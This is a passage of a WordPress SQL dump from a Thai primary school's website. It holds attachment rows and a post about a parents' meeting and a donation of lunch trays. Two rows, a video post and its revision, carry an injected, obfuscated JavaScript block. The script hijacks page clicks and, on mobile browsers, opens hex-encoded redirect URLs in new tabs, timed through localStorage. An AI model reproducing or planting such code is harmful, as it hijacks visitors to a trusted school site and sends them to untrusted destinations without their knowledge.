_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','สุขาดีมีความสุข','','publish','closed','closed','','%e0%b8%aa%e0%b8%b8%e0%b8%82%e0%b8%b2%e0%b8%94%e0%b8%b5%e0%b8%a1%e0%b8%b5%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%aa%e0%b8%b8%e0%b8%82','','','2024-09-12 21:44:23','2024-09-12 14:44:23','',0,'http://pakhaeng.ssk.in.th/?p=1159',0,'post','',0),
(1160,1,'2024-09-12 21:42:52','2024-09-12 14:42:52','','สุขาดีมีความสุข','','inherit','','closed','','%e0%b8%aa%e0%b8%b8%e0%b8%82%e0%b8%b2%e0%b8%94%e0%b8%b5%e0%b8%a1%e0%b8%b5%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%aa%e0%b8%b8%e0%b8%82','','','2024-09-12 21:42:52','2024-09-12 14:42:52','',1159,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/สุขาดีมีความสุข.mp4',0,'attachment','video/mp4',0),
(1161,1,'2024-09-12 21:43:54','2024-09-12 14:43:54','','Screenshot 2024-09-12 213449','','inherit','','closed','','screenshot-2024-09-12-213449','','','2024-09-12 21:43:54','2024-09-12 14:43:54','',1159,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/Screenshot-2024-09-12-213449.png',0,'attachment','image/png',0),
(1162,1,'2024-09-12 21:44:21','2024-09-12 14:44:21','<!-- wp:video {\"id\":1160} -->\n<figure class=\"wp-block-video\"><video controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/สุขาดีมีความสุข.mp4\"></video></figure>\n<!-- /wp:video -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','สุขาดีมีความสุข','','inherit','closed','closed','','1159-revision-v1','','','2024-09-12 21:44:21','2024-09-12 14:44:21','',1159,'http://pakhaeng.ssk.in.th/?p=1162',0,'revision','',0),
(1164,1,'2025-05-09 11:18:44','2025-05-09 04:18:44','<!-- wp:paragraph -->\n<p>วันที่ 8 พฤษภาคม พ.ศ.2568 โรงเรียนบ้านหนองปลาเข็ง-กอไหล่ นำโดย นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน จัดประชุมผู้ปกครองนักเรียน ครั้งที่ 1/2568 เพื่อชี้แจง กฎ ระเบียบของโรงเรียน และเพื่อปรึกษา หารือ แนวทางการปฏิบัติ ร่วมกันกับผู้ปกครองนักเรียน และในการนี้ทางโรงเรียนได้รับมอบถาดอาหารกลางวันนักเรียน จาก</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>นายศุภชัย ดวงแก้ว จำนวน 150 ใบ รวมป็นเงินทั้งสิ้น 13,950 บาท ในโอกาสนี้ทางโรงเรียนบ้านหนองปลาเข็ง กอไหล่ ขอขอบพระคุณท่านเป็นอย่างสูง มา ณ โอกาสนี้</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1166,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291494_0.jpg\" alt=\"\" class=\"wp-image-1166\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1167,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291495_0.jpg\" alt=\"\" class=\"wp-image-1167\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1171,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291496_0-1024x599.jpg\" alt=\"\" class=\"wp-image-1171\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1169,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291497_0-1024x643.jpg\" alt=\"\" class=\"wp-image-1169\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1168,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291498_0.jpg\" alt=\"\" class=\"wp-image-1168\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1170,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291499_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1170\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1172,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291500_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1172\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1173,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291501_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1173\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1174,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/291502_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1174\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1175,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_1-1024x768.jpg\" alt=\"\" class=\"wp-image-1175\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1177,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_2-1-1024x577.jpg\" alt=\"\" class=\"wp-image-1177\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1176,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_3-1024x768.jpg\" alt=\"\" class=\"wp-image-1176\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1178,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/LINE_ALBUM_นิเทศเตรียมเปิดภาคเรียนประชุมผปค_250509_4-1024x768.jpg\" 